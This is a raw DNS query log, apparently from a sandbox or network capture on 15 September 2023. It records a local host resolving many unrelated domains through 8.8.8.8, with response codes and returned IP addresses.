                                                                                                                                                                              Sep 15, 2023 07:27:50.003118038 CEST8.8.8.8192.168.2.30x4e4eServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.025751114 CEST8.8.8.8192.168.2.30xf40dNo error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.025751114 CEST8.8.8.8192.168.2.30xf40dNo error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.025751114 CEST8.8.8.8192.168.2.30xf40dNo error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.047053099 CEST8.8.8.8192.168.2.30x4b4bNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.176920891 CEST8.8.8.8192.168.2.30x65aaServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.305172920 CEST8.8.8.8192.168.2.30x486fName error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.326154947 CEST8.8.8.8192.168.2.30x1820No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.344681978 CEST8.8.8.8192.168.2.30xad08No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.388809919 CEST8.8.8.8192.168.2.30xa60dNo error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.460577965 CEST8.8.8.8192.168.2.30x7e14Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.508483887 CEST8.8.8.8192.168.2.30x3b72No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.605149984 CEST8.8.8.8192.168.2.30x2406Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.668297052 CEST8.8.8.8192.168.2.30xdb15No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.668297052 CEST8.8.8.8192.168.2.30xdb15No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.670959949 CEST8.8.8.8192.168.2.30x5beNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.898212910 CEST8.8.8.8192.168.2.30x9375Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.935386896 CEST8.8.8.8192.168.2.30x229Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.978735924 CEST8.8.8.8192.168.2.30x4e4eServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.033665895 CEST8.8.8.8192.168.2.30x63aaServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.239356041 CEST8.8.8.8192.168.2.30xe897No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.328967094 CEST8.8.8.8192.168.2.30x9fcbNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.355468988 CEST8.8.8.8192.168.2.30x61e7No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.403966904 CEST8.8.8.8192.168.2.30x6397No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.403986931 CEST8.8.8.8192.168.2.30x3bcbName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.412623882 CEST8.8.8.8192.168.2.30x837No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.412623882 CEST8.8.8.8192.168.2.30x837No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.412623882 CEST8.8.8.8192.168.2.30x837No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.412623882 CEST8.8.8.8192.168.2.30x837No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.420670033 CEST8.8.8.8192.168.2.30x18b2No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.423701048 CEST8.8.8.8192.168.2.30x206fNo error (0)envogen.com104.21.73.149A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.423701048 CEST8.8.8.8192.168.2.30x206fNo error (0)envogen.com172.67.163.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.427633047 CEST8.8.8.8192.168.2.30xd4faName error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.532604933 CEST8.8.8.8192.168.2.30xc320No error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.542834997 CEST8.8.8.8192.168.2.30xea24Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.550285101 CEST8.8.8.8192.168.2.30xd84eName error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.555099010 CEST8.8.8.8192.168.2.30xe2feName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.575541973 CEST8.8.8.8192.168.2.30xad43No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.622407913 CEST8.8.8.8192.168.2.30x2406Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.632719040 CEST8.8.8.8192.168.2.30xc50eServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.647207975 CEST8.8.8.8192.168.2.30xa47bName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.650166988 CEST8.8.8.8192.168.2.30x9bc7Name error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.657748938 CEST8.8.8.8192.168.2.30xeaecName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.674802065 CEST8.8.8.8192.168.2.30xb47eNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.728844881 CEST8.8.8.8192.168.2.30xcff5No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.750087976 CEST8.8.8.8192.168.2.30x280bName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.895780087 CEST8.8.8.8192.168.2.30x971cNo error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.014903069 CEST8.8.8.8192.168.2.30xd4faName error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.117297888 CEST8.8.8.8192.168.2.30xbb11Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.118177891 CEST8.8.8.8192.168.2.30x7033Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.222440958 CEST8.8.8.8192.168.2.30xfb5eName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.324103117 CEST8.8.8.8192.168.2.30xc143Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.385399103 CEST8.8.8.8192.168.2.30x1935Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.423901081 CEST8.8.8.8192.168.2.30xc6f1Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.530388117 CEST8.8.8.8192.168.2.30x59f3No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.530388117 CEST8.8.8.8192.168.2.30x59f3No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.530388117 CEST8.8.8.8192.168.2.30x59f3No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.530388117 CEST8.8.8.8192.168.2.30x59f3No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.775228024 CEST8.8.8.8192.168.2.30x7e48No error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.872668982 CEST8.8.8.8192.168.2.30xbd22No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.872668982 CEST8.8.8.8192.168.2.30xbd22No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.913562059 CEST8.8.8.8192.168.2.30x6034No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.993654966 CEST8.8.8.8192.168.2.30x81a8No error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.012459040 CEST8.8.8.8192.168.2.30xe9c4No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.118966103 CEST8.8.8.8192.168.2.30xbb11Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.148082972 CEST8.8.8.8192.168.2.30x48b7No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.148082972 CEST8.8.8.8192.168.2.30x48b7No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.148082972 CEST8.8.8.8192.168.2.30x48b7No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.148082972 CEST8.8.8.8192.168.2.30x48b7No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.429502010 CEST8.8.8.8192.168.2.30x1935Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.545155048 CEST8.8.8.8192.168.2.30x5634No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.573380947 CEST8.8.8.8192.168.2.30x3ad2No error (0)cutchie.com199.59.243.224A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.620753050 CEST8.8.8.8192.168.2.30x2406Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.683476925 CEST8.8.8.8192.168.2.30x9611No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.686655045 CEST8.8.8.8192.168.2.30x11f5No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.719652891 CEST8.8.8.8192.168.2.30x31a8No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.951221943 CEST8.8.8.8192.168.2.30x4554No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.055613995 CEST8.8.8.8192.168.2.30xfb69No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.055613995 CEST8.8.8.8192.168.2.30xfb69No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.055613995 CEST8.8.8.8192.168.2.30xfb69No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.055613995 CEST8.8.8.8192.168.2.30xfb69No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.055613995 CEST8.8.8.8192.168.2.30xfb69No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.138338089 CEST8.8.8.8192.168.2.30xbb11Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.142116070 CEST8.8.8.8192.168.2.30x9b57Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.217979908 CEST8.8.8.8192.168.2.30xb6bbServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.232299089 CEST8.8.8.8192.168.2.30xe22bNo error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.418121099 CEST8.8.8.8192.168.2.30x1935Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.481621981 CEST8.8.8.8192.168.2.30x6bd9Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.534626007 CEST8.8.8.8192.168.2.30xb712No error (0)cjcagent.com72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.539067984 CEST8.8.8.8192.168.2.30x3deNo error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.590472937 CEST8.8.8.8192.168.2.30x816bName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.591327906 CEST8.8.8.8192.168.2.30x69b9Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.662069082 CEST8.8.8.8192.168.2.30xe824No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.693279028 CEST8.8.8.8192.168.2.30x920fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.702711105 CEST8.8.8.8192.168.2.30xc514Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.743581057 CEST8.8.8.8192.168.2.30x2afbNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.751243114 CEST8.8.8.8192.168.2.30x999No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.751243114 CEST8.8.8.8192.168.2.30x999No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.777894020 CEST8.8.8.8192.168.2.30xbdfaNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.798922062 CEST8.8.8.8192.168.2.30x3fe9No error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.798922062 CEST8.8.8.8192.168.2.30x3fe9No error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.964883089 CEST8.8.8.8192.168.2.30x6030No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.964883089 CEST8.8.8.8192.168.2.30x6030No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.148317099 CEST8.8.8.8192.168.2.30x9b57Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.231426001 CEST8.8.8.8192.168.2.30xb6bbServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.331384897 CEST8.8.8.8192.168.2.30x8596No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.394503117 CEST8.8.8.8192.168.2.30x3ddfNo error (0)www.tyrns.com217.79.184.35A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.411015034 CEST8.8.8.8192.168.2.30xe8f5No error (0)aluminox.es94.23.84.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.554992914 CEST8.8.8.8192.168.2.30x765Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.595328093 CEST8.8.8.8192.168.2.30x69b9Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.655136108 CEST8.8.8.8192.168.2.30xb53aName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.695933104 CEST8.8.8.8192.168.2.30x920fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.706502914 CEST8.8.8.8192.168.2.30x8a91No error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.759644032 CEST8.8.8.8192.168.2.30x3fd2Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.765497923 CEST8.8.8.8192.168.2.30x24aNo error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.783854008 CEST8.8.8.8192.168.2.30xae23Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.016768932 CEST8.8.8.8192.168.2.30x803cName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.026700020 CEST8.8.8.8192.168.2.30x1ca5No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.026700020 CEST8.8.8.8192.168.2.30x1ca5No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.026700020 CEST8.8.8.8192.168.2.30x1ca5No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.116951942 CEST8.8.8.8192.168.2.30xd7f9Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.180859089 CEST8.8.8.8192.168.2.30xea4bNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.180859089 CEST8.8.8.8192.168.2.30xea4bNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.180859089 CEST8.8.8.8192.168.2.30xea4bNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.180859089 CEST8.8.8.8192.168.2.30xea4bNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.194055080 CEST8.8.8.8192.168.2.30x4009No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.222819090 CEST8.8.8.8192.168.2.30xb77Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.226387024 CEST8.8.8.8192.168.2.30x9b57Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.227704048 CEST8.8.8.8192.168.2.30xbb11Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.255659103 CEST8.8.8.8192.168.2.30xbe5bNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.255659103 CEST8.8.8.8192.168.2.30xbe5bNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.255659103 CEST8.8.8.8192.168.2.30xbe5bNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.292776108 CEST8.8.8.8192.168.2.30x4b6cNo error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.292776108 CEST8.8.8.8192.168.2.30x4b6cNo error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.307552099 CEST8.8.8.8192.168.2.30x538No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.315196991 CEST8.8.8.8192.168.2.30xb6bbServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.452415943 CEST8.8.8.8192.168.2.30xc5a5Name error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.526282072 CEST8.8.8.8192.168.2.30x8f2fNo error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.558813095 CEST8.8.8.8192.168.2.30x9fb1No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.610532999 CEST8.8.8.8192.168.2.30xcafNo error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.610532999 CEST8.8.8.8192.168.2.30xcafNo error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.614962101 CEST8.8.8.8192.168.2.30x69b9Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.650849104 CEST8.8.8.8192.168.2.30x83d8No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.712004900 CEST8.8.8.8192.168.2.30x920fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.720892906 CEST8.8.8.8192.168.2.30x6659No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.755776882 CEST8.8.8.8192.168.2.30xae23Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.787817001 CEST8.8.8.8192.168.2.30x69b4No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.850665092 CEST8.8.8.8192.168.2.30x9fa7No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.897550106 CEST8.8.8.8192.168.2.30x195No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.982862949 CEST8.8.8.8192.168.2.30x55f9Name error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.086457014 CEST8.8.8.8192.168.2.30xe8cbName error (3)paraski.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.189580917 CEST8.8.8.8192.168.2.30x3d35No error (0)www.tc17.com172.67.150.80A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.189580917 CEST8.8.8.8192.168.2.30x3d35No error (0)www.tc17.com104.21.79.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.214512110 CEST8.8.8.8192.168.2.30x2613Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.373871088 CEST8.8.8.8192.168.2.30x9fbNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.392734051 CEST8.8.8.8192.168.2.30x3af6No error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.392734051 CEST8.8.8.8192.168.2.30x3af6No error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.488239050 CEST8.8.8.8192.168.2.30xb1ecNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.678879023 CEST8.8.8.8192.168.2.30x7803No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.733200073 CEST8.8.8.8192.168.2.30xd3b0No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.733200073 CEST8.8.8.8192.168.2.30xd3b0No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.779124975 CEST8.8.8.8192.168.2.30xa0d2No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.779124975 CEST8.8.8.8192.168.2.30xa0d2No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.779124975 CEST8.8.8.8192.168.2.30xa0d2No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.953310013 CEST8.8.8.8192.168.2.30xc5cdNo error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.190308094 CEST8.8.8.8192.168.2.30x4a77No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.226711988 CEST8.8.8.8192.168.2.30x2613Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.241595030 CEST8.8.8.8192.168.2.30x9b57Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.266925097 CEST8.8.8.8192.168.2.30xabffNo error (0)aluminox.es94.23.84.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.322402954 CEST8.8.8.8192.168.2.30xb6bbServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.399713993 CEST8.8.8.8192.168.2.30xea3cName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.411634922 CEST8.8.8.8192.168.2.30x9242No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.502948046 CEST8.8.8.8192.168.2.30xa46eName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
